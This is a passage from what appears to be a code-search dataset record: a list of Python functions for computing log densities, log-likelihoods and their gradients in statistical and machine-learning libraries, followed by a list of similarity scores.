self.logistic_fn(diag_gamma)\n diag_gamma = logistic_term * (1.0 - logistic_term)\n gamma = np.diag(diag_gamma)\n\n # v computation\n diags_v = 1.0 - 2*self.logistic_fn(np.dot(theta.T, self.X.T))\n diags_v = diags_v.reshape((-1, 1))\n diags_v = diags_v*self.X\n assert diags_v.shape == self.X.shape #N*d shape\n\n XtGamma = np.dot(self.X.T, gamma) # d*N shape\n\n # TODO: Verifier car pas sur de mon coup ... 
et surtout plus long...\n # id = np.eye(self.n_examples).reshape((self.n_examples, self.n_examples, 1))\n # diags_v = diags_v.reshape((self.n_examples, 1, self.dim))\n # v = id*diags_v # n*n*d tensor\n # left = np.tensordot(XtGamma, v, axes=(1, 0)) # shape d*N*d\n # assert left.shape == (self.dim, self.n_examples, self.dim)\n # dg = np.tensordot(left, self.X, axes=(1, 0))\n # dg = np.swapaxes(dg, axis1=-2, axis2=-1)\n\n dg = np.zeros((self.dim, self.dim, self.dim))\n for idx, v_i_diag in enumerate(diags_v.T):\n v_i = np.diag(v_i_diag)\n dg_di = np.dot(np.dot(XtGamma, v_i), self.X)\n dg[:, :, idx] = dg_di\n return dg", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = 1./link_f - y\r\n #grad = y/(link_f**2) - 1./link_f\r\n return grad", "def _forward_log_det_jacobian(self, x):\n d = self._compute_shared(x=x)\n relx = (x - d.x_k) / d.w_k\n relx = relx # tf.where(d.out_of_bounds, 0.5*tf.ones_like(x), relx)\n grad = (\n 2 * tf.math.log(d.s_k) +\n tf.math.log(d.d_kp1 * relx**2 + 2 * d.s_k * relx * (1 - relx) + # newln\n d.d_k * (1 - relx)**2) -\n 2 * tf.math.log((d.d_kp1 + d.d_k - 2 * d.s_k) * relx *\n (1 - relx) + d.s_k))\n return grad # tf.where(d.out_of_bounds, tf.zeros_like(grad), grad)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = (y/link_f) - (1.-y)/(1-link_f)\r\n return grad", "def logp(self, F, Y):\n raise NotImplementedError(\"implement the logp function\\\n for this likelihood\")", "def all_logpdf(x, shape_par):\n return stat.logpdf(x, *shape_par)", "def log_density(\n self,\n theta_unc: FloatArray,\n *,\n propto: bool = True,\n jacobian: bool = True,\n ) -> float:\n lp = ctypes.pointer(ctypes.c_double())\n err = ctypes.pointer(ctypes.c_char_p())\n rc = self._log_density(\n self.model, int(propto), int(jacobian), theta_unc, lp, err\n )\n if rc:\n raise self._handle_error(err.contents, \"log_density\")\n return lp.contents.value", "def dlogpdf_dlink(self, link_f, y, Y_metadata=None):\n grad = 1./link_f - y\n #grad = y/(link_f**2) - 1./link_f\n return grad", "def logpdf(self, X, pool=None):\n logpdfs = []\n for logweight, space, kde in zip(self._logweights,\n self._spaces,\n self._kdes):\n # Calculate the probability for each parameter space individually\n if np.all(space == ~X.mask) and np.isfinite(logweight):\n logpdfs.append(logweight + kde(X[space], pool=pool))\n\n return logsumexp(logpdfs, axis=0)", "def log_density_gradient(\n self,\n theta_unc: FloatArray,\n *,\n propto: bool = True,\n jacobian: bool = True,\n out: Optional[FloatArray] = None,\n ) -> Tuple[float, FloatArray]:\n dims = self.param_unc_num()\n if out is None:\n out = np.zeros(shape=dims)\n elif out.size != dims:\n raise ValueError(f\"out size = {out.size} != params size = {dims}\")\n lp = ctypes.pointer(ctypes.c_double())\n err = ctypes.pointer(ctypes.c_char_p())\n rc = self._log_density_gradient(\n self.model, int(propto), int(jacobian), theta_unc, lp, out, err\n )\n if rc:\n raise self._handle_error(err.contents, \"log_density_gradient\")\n return lp.contents.value, out", "def dsdlogdp(self):\n return self.dndlogdp.mul(self.s_multiplier)", "def grad_neg_log_like(params):\n gp.set_parameter_vector(params)\n return -gp.grad_log_likelihood(y, quiet=True)", "def logpdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized logposterior not implemented\")", "def log_prob(self, x):\n z, log_det = 
self.backward_p(x)\n return self.prior.log_prob(z) + log_det", "def test_cloglog_transform_deriv_v(self):\n # Note the index has a value that is <= -40 to test whether or not\n # the function correctly uses L'Hopital's rule to deal with underflow\n # and calculating the derivative. When the index is <= -40, the\n # derivative should be 1.\n test_index = np.array([-40, 1, 7])\n # Note we use a compressed sparse-row matrix so that we can easily\n # convert the output matrix to a numpy array using the '.A' attribute.\n test_output = diags(np.ones(test_index.shape[0]),\n 0, format='csr')\n\n # Bundle the arguments needed for the function\n # Not all elements except for test_index are completely fake and only\n # needed because the function requires a given number of arguments.\n # This is for api compatibility with other models.\n args = [test_index,\n np.ones(3),\n diags(np.ones(3), 0, format='csr'),\n None]\n\n # Get the derivative using the function defined in clog_log.py.\n derivative = clog._cloglog_transform_deriv_v(*args,\n output_array=test_output)\n\n # Calculate, 'by hand' what the results should be\n correct_derivatives = np.diag(np.array([1,\n 2.910328703250801,\n 1096.6331584284585]))\n\n self.assertIsInstance(derivative, type(test_output))\n self.assertEqual(len(derivative.shape), 2)\n self.assertEqual(derivative.shape, (3, 3))\n npt.assert_allclose(correct_derivatives, derivative.A)\n\n return None", "def grad_llh(self, params):\n grad = np.clip(self.grad_log_likelihood(params[0], params[1], params[2:]), SMALLEST_NUMBER,\n LARGEST_NUMBER)\n\n return grad", "def logpdf(self, flattened_parameters):\n unflattened_parameters = self.unflatten_parameter_array(flattened_parameters)\n dict_to_pass = {**unflattened_parameters, **self.data_dict}\n return np.sum([x.logpdf(**dict_to_pass) for x in self.node_dict.values()])", "def log_pacc(xy, x, y, h):\n logp = log_q(xy, y, x, h)\n logp += xy.log_density(y)\n logp -= log_q(xy, x, y, h)\n logp -= xy.log_density(x)\n return logp", "def log_pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.log_pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def _sderiv_log10(self,t,x,params_sens = None):\n if params_sens is None:\n print(\"Please set the parameter values\")\n params_unif = {}\n for param_name, param_val in params_sens.items():\n bound_a, bound_b = self.param_sens_bounds[param_name]\n params_unif[param_name] = ((bound_b - bound_a)*param_val/2 + (bound_a + bound_b)/2) \n return super()._sderiv_log10(t,x,params_sens = params_unif)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def logtrapz(logy, x=None, dx=1.0):\n n_intvls = logy.shape[0]-1\n loghalf = log(.5)\n if x is not None:\n logdel = x[1:] - x[0:-1]\n else:\n logdel = ones(n_intvls)*dx\n logdel = log(logdel)\n lo = logy[0] + loghalf + logdel[0]\n hi = logy[-1] + loghalf + logdel[-1]\n lsum = logaddexp(lo, hi)\n for i in xrange(1,n_intvls):\n lsum = logaddexp(lsum, logy[i] + logdel[i])\n return lsum", "def log_norm_pdf(x, sigma):\n _, det_sigma = np.linalg.slogdet(sigma)\n return -0.5*np.dot(x.T, np.linalg.solve(sigma,x))[0,0] - np.log(2*np.pi) - det_sigma", "def 
nloglikeobs(self, params):\n #print len(params),\n beta = params[:-2]\n df = params[-2]\n scale = params[-1]\n loc = np.dot(self.exog, beta)\n endog = self.endog\n x = (endog - loc)/scale\n #next part is stats.t._logpdf\n lPx = sps_gamln((df+1)/2) - sps_gamln(df/2.)\n lPx -= 0.5*np_log(df*np_pi) + (df+1)/2.*np_log(1+(x**2)/df)\n lPx -= np_log(scale) # correction for scale\n return -lPx", "def photometric_stellarparam_derivatives(Teff, logg,\n dTdcolor,dvtdlogg=None,\n color=None, dTdcolor_func=None):\n \n dloggdT = 4/(np.log(10) * Teff) + 0.4/dTdcolor\n \n if dvtdlogg is None or dvtdlogg==\"B05\":\n # This is the analytic derivative of the Barklem+2005 relation\n dvtdlogg = 0.173 * logg - 0.6897\n elif dvtdlogg == \"M08\":\n dvdtdlogg = -0.322\n elif dvtdlogg == \"K09\":\n dvdtdlogg = -0.23\n return dloggdT, dvtdlogg", "def passDerivative(self):\n # this will happen when this SumNode is unused\n if self.getLogDerivative() == Node.ZERO:\n return \n for decomp_id in self.getChildren():\n prodNode = self.getChild(decomp_id)\n tmp = self.getLogDerivative() \\\n + np.log(float(self.getChildCounts(decomp_id)) / self.getCounts())\n\n if prodNode.getLogDerivative() == Node.ZERO:\n prodNode.setLogDerivative(tmp)\n else:\n prodNode.setLogDerivative( \\\n np.logaddexp(tmp, self.getLogDerivative()))", "def log_prior_grad(self, inputs):", "def inverse_diff_log(y,log0):\n\n return np.exp(inverse_diff(y,log0))", "def dlogpdf_link_dvar(self, link_f, y, Y_metadata=None):\n\n c = np.zeros_like(y)\n if Y_metadata is not None and 'censored' in Y_metadata.keys():\n c = Y_metadata['censored']\n\n val = np.log(y) - link_f\n val_scaled = val/np.sqrt(self.variance)\n val_scaled2 = val/self.variance\n a = (1 - stats.norm.cdf(val_scaled))\n uncensored = (1-c)*(-0.5/self.variance + (val**2)/(2*(self.variance**2)) )\n censored = c *( val*np.exp(-val**2/ (2*self.variance)) / (a*np.sqrt(2*np.pi)*2*(self.variance**(1.5))) )\n dlogpdf_dvar = uncensored + censored\n # dlogpdf_dvar = dlogpdf_dvar*self.variance\n return dlogpdf_dvar", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def posterior_loss(X, mu, sigma, log_pi):\r\n log_PDF = log_GaussPDF(X, mu, sigma)\r\n log_post = log_posterior(log_PDF, log_pi)\r\n\r\n loss = torch.logsumexp(log_post, dim=1)\r\n # loss = torch.exp(log_post)\r\n # loss = torch.sum(loss, dim=1)\r\n # loss = torch.log(loss)\r\n loss = torch.sum(loss)\r\n loss = -loss\r\n return loss", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def log_likelihood(self):\n\n if self._log_likelihood is None:\n self._log_likelihood = logpdf(x=self.y, cov=self.S)\n return self._log_likelihood", "def dlogpdf_link_dvar(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n dlogpdf_dvar = self.v*(e**2 - self.sigma2)/(2*self.sigma2*(self.sigma2*self.v + e**2))\r\n return np.sum(dlogpdf_dvar)", "def log_likelihood_gradients(self, y, f):\n # align shapes and compute mask\n y = y.reshape(-1, 1)\n f = f.reshape(-1, 1)\n mask = np.isnan(y)\n y = np.where(mask, f, y)\n\n # compute gradients of the log likelihood\n log_lik, J, H = vmap(self.log_likelihood_gradients_)(y, f)\n\n # apply mask\n mask = np.squeeze(mask)\n log_lik = np.where(mask, 0., log_lik)\n J = np.where(mask, np.nan, J)\n H = np.where(mask, np.nan, H)\n\n return log_lik, J, np.diag(H)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert 
np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return y/link_f - 1", "def LL(y, yhat):\n\n return -np.sum(norm.logpdf(y, loc=yhat, scale=np.std(y)))", "def inverse_diff_log(y,log0):\n \n return np.exp(inverse_diff(y,log0))", "def log_gamma_unnormalised_lpdf(x, alpha, beta):\n return alpha * x - beta * tf.exp(x)", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]" ]
[ "0.77660567", "0.70519257", "0.6876588", "0.6850686", "0.67922556", "0.677512", "0.67627126", "0.67627126", "0.6756322", "0.67217326", "0.67073756", "0.65952337", "0.6584878", "0.6568949", "0.65437335", "0.6536892", "0.65261656", "0.65239733", "0.651334", "0.6512677", "0.6508049", "0.64886004", "0.6481579", "0.6441033", "0.6440329", "0.6438905", "0.64342606", "0.6430511", "0.6428168", "0.640558", "0.64006346", "0.63819534", "0.63742536", "0.6370675", "0.63610005", "0.63602763", "0.6348054", "0.6314391", "0.62960535", "0.6283043", "0.6282809", "0.626877", "0.6237661", "0.6234541", "0.6232098", "0.62295455", "0.6220143", "0.6198616", "0.61962056", "0.61893904", "0.6187063", "0.61756223", "0.61743283", "0.6173269", "0.6173269", "0.61719704", "0.6168255", "0.61544967", "0.6135736", "0.6133827", "0.6126694", "0.6121292", "0.6114071", "0.6105251", "0.61023813", "0.6100833", "0.6097435", "0.609394", "0.6093167", "0.60813755", "0.60613155", "0.60599744", "0.6046563", "0.60453933", "0.6042667", "0.6030531", "0.60291415", "0.6023166", "0.6020554", "0.6020444", "0.6020254", "0.6018804", "0.6016359", "0.6005829", "0.6005371", "0.5997181", "0.5993268", "0.59781915", "0.59747344", "0.5974362", "0.59707326", "0.59685886", "0.5963416", "0.5959489", "0.59565234", "0.5956445", "0.59517485", "0.5942429", "0.59384006", "0.59356576" ]
0.82203406
0
Compute the square (in matrix terms, i.e. the outer product dlog ⊗ dlog) of dlog. This is the variable whose expectation is the Fisher-Rao information.
def log_pdf_derivative_squared(x):
    dlog = log_pdf_derivative(x)
    return gs.einsum("...i, ...j -> ...ij", dlog, dlog)
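The Fisher-Rao information matrix is the expectation of this squared score under the model. A minimal illustrative sketch of that relationship, assuming a hypothetical sample(n) helper that draws from the model distribution and a NumPy-compatible log_pdf_derivative (neither is part of the record above):

import numpy as np

def fisher_information_monte_carlo(sample, log_pdf_derivative, n_samples=10_000):
    # Monte Carlo estimate of E[dlog dlog^T], the Fisher(-Rao) information matrix.
    xs = sample(n_samples)  # draws from the model distribution (assumed helper)
    scores = np.stack([np.asarray(log_pdf_derivative(x)) for x in xs])  # (n, dim)
    outer = np.einsum("ni,nj->nij", scores, scores)  # per-sample squared score
    return outer.mean(axis=0)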
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logdim():\n dim = Real(\"yolo4\", \"reciprocal\", 1.0, 10.0, shape=(3, 2))\n return dim", "def dloglam(self):\n # This number was determined using the resolution and sampling quoted on the FIRE website\n R = 6000.0 * 2.7\n dloglam = 1.0 / R / np.log(10.0)\n return dloglam", "def calc_F(self, peq):\n return self.dmat_d_.dot(np.log(peq))", "def logm(self, x):\n\n if K.backend() == 'theano':\n # construct theano tensor operation\n from theano.tensor.nlinalg import svd, diag\n from theano.tensor.elemwise import Elemwise\n from theano.scalar import log\n import theano.tensor as T\n # This implementation would be extremely slow. but efficient?\n u, d, v = svd(x)\n d += self.eps\n inner = diag(T.log(d))\n res = T.dot(u, T.dot(inner, v))\n return res\n else:\n from kyu.tensorflow.ops.svd_gradients import batch_matrix_log\n return batch_matrix_log(x, self.eps)", "def SFlnlike(self,theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=-1.0*np.sum(np.log(self.SFlike_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log(self) -> np.ndarray:\n S = 0.5*(self.A-self.A.T) # Skew-symmetric matrix\n y = np.array([S[2, 1], -S[2, 0], S[1, 0]]) # Axis\n if np.allclose(np.zeros(3), y):\n return np.zeros(3)\n y2 = np.linalg.norm(y)\n return np.arcsin(y2)*y/y2", "def lnlike(theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=np.sum(np.log(like_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log(self: Float[LinearOperator, \"*batch M N\"]) -> Float[LinearOperator, \"*batch M N\"]:\n return ConstantDiagLinearOperator(self.diag_values.log(), diag_shape=self.diag_shape)", "def log(obj):\n\tif isinstance(obj, Variable):\n\t\tval = np.log(obj.val)\n\t\tder = np.divide(1,obj.val)\n\t\t# print(obj.der)\n\t\t# print(der)\n\t\t# print(obj.der.shape)\n\t\t# print(der.shape)\n\t\tif len(obj.der.shape)>len(der.shape):\n\t\t\tder = np.expand_dims(der,1)\n\t\tder = np.multiply(der, obj.der)\n\t\treturn Variable(val, der)\n\telse:\n\t\treturn np.log(obj)", "def log(self: Float[LinearOperator, \"*batch M N\"]) -> Float[LinearOperator, \"*batch M N\"]:\n return self.__class__(self._diag.log())", "def logarithm(self) -> np.ndarray:\n u = self.v/np.linalg.norm(self.v)\n if self.is_versor():\n if self.is_pure():\n return np.array([0.0, *(0.5*np.pi*u)])\n return np.array([0.0, *(u*np.arccos(self.w))])\n qn = np.linalg.norm(self.A)\n if self.is_pure():\n return np.array([np.log(qn), *(0.5*np.pi*u)])\n return np.array([np.log(qn), *(u*np.arccos(self.w/qn))])", "def aiot(d):\n res = A * (1-exp(-d/D)) / magic\n _adjust(res)\n return ( log(res) if use_log\n else res )", "def log_q(xy, x, y, h):\n return -linalg.norm(y - x - h*xy.grad_log_density(x))/(4*h)", "def log(d: D) -> NumDict:\n\n return d.log()", "def logarithmic():\n return Equivalency(\n [(dimensionless_unscaled, function_units.dex, np.log10, lambda x: 10.0**x)],\n \"logarithmic\",\n )", "def log(self):\n return F.Log.apply(self)", "def grad_log(self, X):\n # \"\"\"\n # Evaluate the gradients (with respect to the input) of the log density at\n # each of the n points in X. 
This is the score function.\n\n # X: n x d numpy array.\n XB = np.dot(X, self.B)\n Y = 0.5*XB + self.c\n E2y = np.exp(2*Y)\n # n x dh\n Phi = old_div((E2y-1.0),(E2y+1))\n # n x dx\n T = np.dot(Phi, 0.5*self.B.T)\n S = self.b - X + T\n return S", "def weighted_log_density(self):\n return self.rho*math.log(self.density)", "def test_loglike(dlm,Cl,noise,beam):\n lmax = Cl.shape[0]\n tt_exp = -1./2 * np.real(np.vdot(dlm.T,hp.almxfl(dlm,1/(beam[:lmax]**2*Cl[:,1]+noise[:lmax]))))\n #plt.plot(Cl[:,1])\n tt_det = - 1./2 *(np.arange(1,lmax+1)*np.log((noise[:lmax]+Cl[:,1]*beam[:lmax]**2))).sum() \n tt_f = tt_exp + tt_det\n return tt_exp,tt_det,tt_f#,Cl[:,1]", "def dsdlogdp(self):\n return self.dndlogdp.mul(self.s_multiplier)", "def pddet(A):\r\n L = jitchol(A)\r\n logdetA = 2*sum(np.log(np.diag(L)))\r\n return logdetA", "def _R(self):\n return np.exp(self._log_R)", "def _loglike(self, y, f):\n ll = -0.5 * (tf.log(2 * self.variance * np.pi) +\n (y - f)**2 / self.variance)\n return ll", "def log_det_S(self, Rs = None):\n if Rs is None:\n Rs = self.Rs\n return np.sum([self.n/R.shape[0]*\n np.linalg.slogdet(R.T.dot(R))[1]\n for R in Rs])", "def fisher_diag(\n negative_log_likelihood: LossFun,\n params: Any,\n inputs: jnp.ndarray,\n targets: jnp.ndarray,\n) -> jnp.DeviceArray:\n return jnp.square(\n ravel(jax.grad(negative_log_likelihood)(params, inputs, targets)))", "def _log_det_observation_precision(self):\n return tf.reduce_sum(tf.linalg.logdet(self._r_inv), axis=-1)", "def ln(q):\n normq = amplitude(q)\n res = np.zeros_like(q)\n res[:,3:] = np.log(normq)\n res[:,:3] = norm(q[:,:3])\n res[:,:3] *= np.arccos(q[:,3:]/normq)\n return res", "def _log_det_observation_precision(self):\n return tf.reduce_sum(tf.linalg.logdet(self._r_inv_data), axis=-1)", "def log2(self):\n return Factor().__build( VarSet(self.v) , np.log2(self.t) )", "def log(self): # just use base?\n return Factor().__build( VarSet(self.v) , np.log(self.t) )", "def __convert_to_log(self):\n for i in range(self.nStates):\n if self.pi[i]>0:\n self.pi[i]=log(self.pi[i])\n else:\n self.pi[i]=float('-inf')\n for j in range(self.nStates):\n if self.t[i][j]>0:\n self.t[i][j]=log(self.t[i][j])\n else:\n self.t[i][j]=float('-inf')\n for j in range(self.nObs):\n if self.e[i][j]>0:\n self.e[i][j]=log(self.e[i][j])\n else:\n self.e[i][j]=float('-inf')\n self.logdomain=True", "def lognormexp(values, dim=0):\n\n log_denominator = torch.logsumexp(values, dim=dim, keepdim=True)\n # log_numerator = values\n return values - log_denominator", "def lognormexp(values, dim=0):\n\n log_denominator = torch.logsumexp(values, dim=dim, keepdim=True)\n # log_numerator = values\n return values - log_denominator", "def test_log():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.log(fwd.sin(x)+y**2)\n dfdx = lambda x, y: np.cos(x) / (np.sin(x)+y**2)\n dfdy = lambda x, y: 2*y / (np.sin(x)+y**2)\n d2fdxdy = lambda x, y: -2*y*np.cos(x) / (np.sin(x)+y**2)**2\n assert equals(f.evaluation_at({x: 1.5, y:2.5}), np.log(np.sin(1.5)+2.5**2))\n assert equals(f.derivative_at(x, {x: 1.5, y:2.5}), dfdx(1.5, 2.5))\n assert equals(f.derivative_at(y, {x: 1.5, y:2.5}), dfdy(1.5, 2.5))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}), d2fdxdy(1.5, 2.5))\n with pytest.raises(NotImplementedError):\n f.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def convert_deriv_to_log10(J,dpred):\n Jlog = np.log10(np.exp(1.0)) * J /dpred\n # That /dpred divides element-wise into every column the matrix via Python's broadcasting.\n return Jlog", "def _compute_log_det_cholesky(matrix_chol, 
covariance_type, n_features):\n if covariance_type == 'full':\n n_components, _, _ = matrix_chol.shape\n log_det_chol = (np.sum(np.log(\n matrix_chol.reshape(\n n_components, -1)[:, ::n_features + 1]), 1))\n\n elif covariance_type == 'tied':\n log_det_chol = (np.sum(np.log(np.diag(matrix_chol))))\n\n elif covariance_type == 'diag':\n log_det_chol = (np.sum(np.log(matrix_chol), axis=1))\n\n else:\n log_det_chol = n_features * (np.log(matrix_chol))\n\n return log_det_chol", "def Schechter_log(self, logl, phis, alpha, logls):\n l = np.power(10., logl)\n ls = np.power(10., logls)\n phi = np.log(10) * phis * np.power(l / ls, (alpha + 1)) * np.exp(-l / ls)\n return phi", "def loglike(store):\n nobs = store['yvec'].shape[0]\n calcweighted(store)\n store['regsampler'].update_yvec(store['yvectil'])\n store['regsampler'].update_xmat(store['xmattil'])\n return store['regsampler'].loglike(store['sigma'], store['beta'])", "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n tr_filter = trfbank(samplingrate, nfft)\n return np.log(np.dot(input, tr_filter.transpose()))", "def log_deriv(error):\n return logistic(error) * (1 - logistic(error))", "def my_square(d):asaasasassssssssssssssssssssssssss\n\t return (d ** 3)", "def log_joint(self):\n return sum([\n self.log_marg_like(self.gamma, self.gamma0, self.lamb, self.nu),\n self._gamma0_distribution.logpdf(self.gamma0),\n self._nu_distribution.logpdf(self.nu),\n self._lambda_distribution.logpdf(self.lamb),\n self.probit_distribution(self.xi).logpdf(self.gamma),\n self._xi_distribution.logpdf(self.xi) if self.sample_xi else 0.0\n ])", "def radio_lumfn(L, _params):\n print _params\n # Number density as a function of sfr, dn/dlog(sfr)\n sfr = L * 5.52e-29 # erg/s/Hz, Bell (2003), Eq. 6\n dndlogsfr_sfms, dndlogsfr_pass = g.sfr_fn(hm, sfr, z=0., params=_params)\n #phi = dndlogsfr_sfms #+ dndlogsfr_pass\n return dndlogsfr_sfms, dndlogsfr_pass", "def log2(obj):\n\tif isinstance(obj, Variable):\n\t\tval = np.log2(obj.val)\n\t\tder = np.divide(1,obj.val)\n\t\tif len(obj.der.shape)>len(der.shape):\n\t\t\tder = np.expand_dims(der,1)\n\t\tder = np.multiply(der, obj.der)\n\t\treturn Variable(val, der)\n\telse:\n\t\treturn np.log2(obj)", "def _calculate_log_det(self, var):\n log_det = []\n\n for k in range(self.n_components):\n evals, evecs = tf.linalg.eig(var[0, k])\n\n log_det.append(tf.reduce_sum(tf.math.log(tf.math.real(evals))))\n log_det = tf.convert_to_tensor(log_det)\n return tf.expand_dims(log_det, -1)", "def fast_logdet(matrix):\n sign, ld = np.linalg.slogdet(matrix)\n if not sign > 0:\n return -np.inf\n return ld", "def log_den(self, X):\n raise NotImplementedError()", "def logtomo(self, psi):\n return -1j / self.wavenumber() * self.mlog(psi) / self.voxelsize", "def log_entropy(dm):\n size = len(dm)\n entropy = 0\n w, v = np.linalg.eig(dm)\n for n in range(size):\n if w[n] != 0:\n entropy = entropy - w[n] * np.log2(w[n])\n return entropy", "def _log_det_observation_precision(self):\n num_data = self.prior_ssm.num_transitions + 1\n return tf.cast(num_data, default_float()) * tf.linalg.logdet(self._r_inv)", "def __dNdlog2dN(self,Dp,dNdlogDp):\n \n x = np.log10(Dp)\n y = (x[1:]+x[:-1])/2.\n y = np.pad(y,1,'constant',constant_values=(x[0]-(y[0]-x[0]),x[-1]+(x[-1]-y[-1])))\n dlogDp = np.diff(y)\n return dNdlogDp*dlogDp # cm-3", "def log_likelihood(self):\r\n if self.likelihood.is_heteroscedastic:\r\n A = -0.5 * self.num_data * self.output_dim * np.log(2.*np.pi) + 0.5 * np.sum(np.log(self.likelihood.precision)) - 0.5 * np.sum(self.likelihood.V * 
self.likelihood.Y)\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision.flatten() * self.psi0) - np.trace(self._A))\r\n else:\r\n A = -0.5 * self.num_data * self.output_dim * (np.log(2.*np.pi) - np.log(self.likelihood.precision)) - 0.5 * self.likelihood.precision * self.likelihood.trYYT\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision * self.psi0) - np.trace(self._A))\r\n C = -self.output_dim * (np.sum(np.log(np.diag(self.LB)))) # + 0.5 * self.num_inducing * np.log(sf2))\r\n D = 0.5 * self.data_fit\r\n self._A_part, self._B_part, self._C_part, self._D_part = A, B, C, D\r\n return A + B + C + D + self.likelihood.Z", "def log2(tensor):\n return log(tensor, base=2)", "def log_sum_exp(x, dim=0):\n max_x = torch.max(x, dim)[0]\n new_x = x - max_x.unsqueeze(dim).expand_as(x)\n return max_x + (new_x.exp().sum(dim)).log()", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def grad_log(self, X):\n g = autograd.elementwise_grad(self.log_den)\n G = g(X)\n return G", "def _loglike(self, y, f):\n ll = y * tf.log(pos(f)) + (1 - y) * tf.log(pos(1 - f))\n return ll", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def dvdlogdp(self):\n return self.dndlogdp.mul(self.v_multiplier)", "def log2(a):", "def _compute_logarithmic_distance_term(index, M, Rhypo):\r\n return ((a4[index] + a5 * (M - c1)) * np.log(np.sqrt(Rhypo**2. + a6**2.)))", "def _smw_logdet(s, A, AtA, B, BI, B_logdet):\n\n p = A.shape[0]\n\n if _no_smw or BI is None:\n mat = np.dot(A, np.dot(B, A.T))\n # Add constant to diagonal\n mat.flat[::p+1] += s\n _, ld = np.linalg.slogdet(mat)\n return ld\n\n ld = p * np.log(s)\n\n qmat = BI + AtA / s\n _, ld1 = np.linalg.slogdet(qmat)\n\n return B_logdet + ld + ld1", "def logaddexp(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n return torch.max(x, y) + torch.log(1 + torch.exp(-torch.abs(y - x)))", "def log_distr_fdmwz(self, dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=None):\n flux = np.power(10., logflux)\n logl = np.log10(self.cos.Luminosity(z, f=flux, dnu=dnu))\n logint1 = self.log_IntBeam(logl, alpha, logls, logl0)\n #print logint1\n logw0 = logw - np.log10(1+z)\n logfw = self.log_dis_logw(logw0, mu, sigma)\n logfz = self.log_Distribution_volume(z)\n dmi = self.cos.DispersionMeasure_IGM(z)\n u1 = (dme-dmi)*(1+z)*self.kappa(z)\n u2 = ((dme-dmi)*(1+z)-self.DMsmax)*self.kappa(z)\n #print u2\n logint2 = np.ones(u2.shape) * (-1e99)\n ind = u2 > 0\n logint2[ind] = self.log_IntDMsrc(u1[ind],u2[ind],gtype=gtype)\n #print logint2\n loglikv = logint1 + logfz + logfw + logint2 + np.log(1+z)\n return loglikv", "def toeplitz_slogdet(r):\n n = len(r)\n r_0 = r[0]\n \n r = np.concatenate((r, np.array([r_0])))\n r /= r_0 # normalize the system so that the T matrix has diagonal of ones\n \n logdet = n*np.log(np.abs(r_0))\n sign = np.sign(r_0)**n\n \n if n == 1:\n return (sign, logdet)\n \n # now on is a modification of Levinson algorithm\n y = zeros((n,))\n x = zeros((n,))\n\n b = -r[1:n+1] \n r = r[:n]\n \n y[0] = -r[1]\n x[0] = b[0]\n beta = 1\n alpha = -r[1]\n \n d = 1 + dot(-b[0], x[0])\n sign *= np.sign(d)\n logdet += np.log(np.abs(d))\n \n for k in range(0,n-2):\n \n beta = (1 - alpha*alpha)*beta\n mu = (b[k+1] - dot(r[1:k+2], x[k::-1])) /beta\n x[0:k+1] = x[0:k+1] + mu*y[k::-1]\n x[k+1] = mu\n \n d = 1 + dot(-b[0:k+2], x[0:k+2])\n sign *= np.sign(d)\n logdet += np.log(np.abs(d))\n \n if 
